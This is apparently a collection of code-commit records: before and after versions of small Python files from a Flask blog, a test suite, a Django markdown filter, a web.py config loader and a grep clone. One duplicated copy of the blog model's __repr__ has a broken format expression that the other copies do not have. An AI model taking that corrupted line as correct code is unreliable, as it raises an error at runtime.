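        if callable(value):
            value = value(self)          # resolve lazily, then cache
            dict.__setitem__(self, key, value)
        return value

d = TinyLazy()
d['sum'] = lambda s: s['a'] + s['b']
d['a'] = 1
d['b'] = 2
print(d['sum'])                          # 3, resolved only now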
1469da25fec3e3e966d5a0b5fab11dd279bbe05a
|
blogsite/models.py
|
blogsite/models.py
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % (self.id, self.title)
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % (self.id, self.title)
|
Correct type comment for table columns
|
Correct type comment for table columns
|
Python
|
mit
|
paulaylingdev/blogsite,paulaylingdev/blogsite
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % (self.id, self.title)
Correct type comment for table columns
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % (self.id, self.title)
|
<commit_before>"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % (self.id, self.title)
<commit_msg>Correct type comment for table columns<commit_after>
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % (self.id, self.title)
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
Correct type comment for table columns"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % (self.id, self.title)
|
<commit_before>"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % (self.id, self.title)
<commit_msg>Correct type comment for table columns<commit_after>"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % (self.id, self.title)
|
0cda764617dcbf52c36d4a63e240b6f849b06640
|
tests/app/test_application.py
|
tests/app/test_application.py
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
Add test for not found URLs
|
Add test for not found URLs
|
Python
|
mit
|
alphagov/digitalmarketplace-admin-frontend,alphagov/digitalmarketplace-admin-frontend,mtekel/digitalmarketplace-admin-frontend,mtekel/digitalmarketplace-admin-frontend,alphagov/digitalmarketplace-admin-frontend,mtekel/digitalmarketplace-admin-frontend,mtekel/digitalmarketplace-admin-frontend,alphagov/digitalmarketplace-admin-frontend
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
Add test for not found URLs
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
<commit_before>from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
<commit_msg>Add test for not found URLs<commit_after>
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
Add test for not found URLsfrom .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
<commit_before>from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
<commit_msg>Add test for not found URLs<commit_after>from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
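BaseApplicationTest itself is not part of this record, but the two assertions follow the standard WSGI test-client pattern. A self-contained Flask analogue (hypothetical app, not the marketplace code):

# Hypothetical minimal app reproducing the two status-code checks above.
from flask import Flask

app = Flask(__name__)

@app.route('/')
def index():
    return 'ok'

client = app.test_client()
assert client.get('/').status_code == 200           # known route
assert client.get('/not-found').status_code == 404  # unregistered route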
18cd9a1db083db1ce0822bab2f502357eeec97b5
|
blog/tests/test_templatetags.py
|
blog/tests/test_templatetags.py
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
Test HTML handling in markdown
|
Test HTML handling in markdown
|
Python
|
agpl-3.0
|
node13h/droll,node13h/droll
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
Test HTML handling in markdown
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
<commit_before>from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
<commit_msg>Test HTML handling in markdown<commit_after>
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
Test HTML handling in markdownfrom django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
<commit_before>from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
<commit_msg>Test HTML handling in markdown<commit_after>from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
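The filter under test, `md_as_html5`, lives in a `markdown` template-tag library that the record does not include. A hypothetical minimal version, assuming the python-markdown package with its fenced_code extension (the project's real filter may differ, for example in how it maps the code-block class):

# blog/templatetags/markdown.py: hypothetical sketch, not the project's code
import markdown
from django import template
from django.utils.safestring import mark_safe

register = template.Library()

@register.filter
def md_as_html5(text):
    # fenced_code handles the ~~~~{.python} blocks used in the test body
    return mark_safe(markdown.markdown(text, extensions=['fenced_code']))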
726370913332fd5e27bb04446b75ef59fb711a9c
|
broadgauge/main.py
|
broadgauge/main.py
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
Read mail settings from config.
|
Read mail settings from config.
|
Python
|
bsd-3-clause
|
fsmk/fsmkschool,anandology/broadgauge
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
Read mail settings from config.
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
<commit_before>import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
<commit_msg>Read mail settings from config.<commit_after>
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
Read mail settings from config.import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
<commit_before>import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
<commit_msg>Read mail settings from config.<commit_after>import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
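For context on the record above: the commit only copies the MAIL_* environment variables into web.config under lowercased keys; nothing in the record actually sends mail. The sketch below is illustrative and not part of the record — it assumes a dict populated the same way and hands the values to the standard-library smtplib. The send_plain_mail helper and the example host/addresses are hypothetical.
import smtplib
from email.message import EmailMessage

# Stand-in for web.config after load_config_from_env(); keys are the
# lowercased MAIL_* names introduced by the commit above.
mail_config = {
    "mail_server": "smtp.example.com",   # hypothetical host
    "mail_username": "user",
    "mail_password": "secret",
    "mail_tls": "true",
    "from_address": "noreply@example.com",
}

def send_plain_mail(to_addr, subject, body, conf=mail_config):
    """Send a plain-text mail using the mail_* settings (hypothetical)."""
    msg = EmailMessage()
    msg["From"] = conf["from_address"]
    msg["To"] = to_addr
    msg["Subject"] = subject
    msg.set_content(body)
    with smtplib.SMTP(conf["mail_server"]) as smtp:
        if conf.get("mail_tls", "").lower() == "true":
            smtp.starttls()  # MAIL_TLS was set, upgrade the connection
        smtp.login(conf["mail_username"], conf["mail_password"])
        smtp.send_message(msg)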
4a32838db7cbfa1962f3cd61f46caa308e4ea645
|
src/rgrep.py
|
src/rgrep.py
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
Add match and case insensitive methods
|
Add match and case insensitive methods
|
Python
|
bsd-2-clause
|
ambidextrousTx/RGrep-Python
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
Add match and case insensitive methods
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
<commit_before>def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
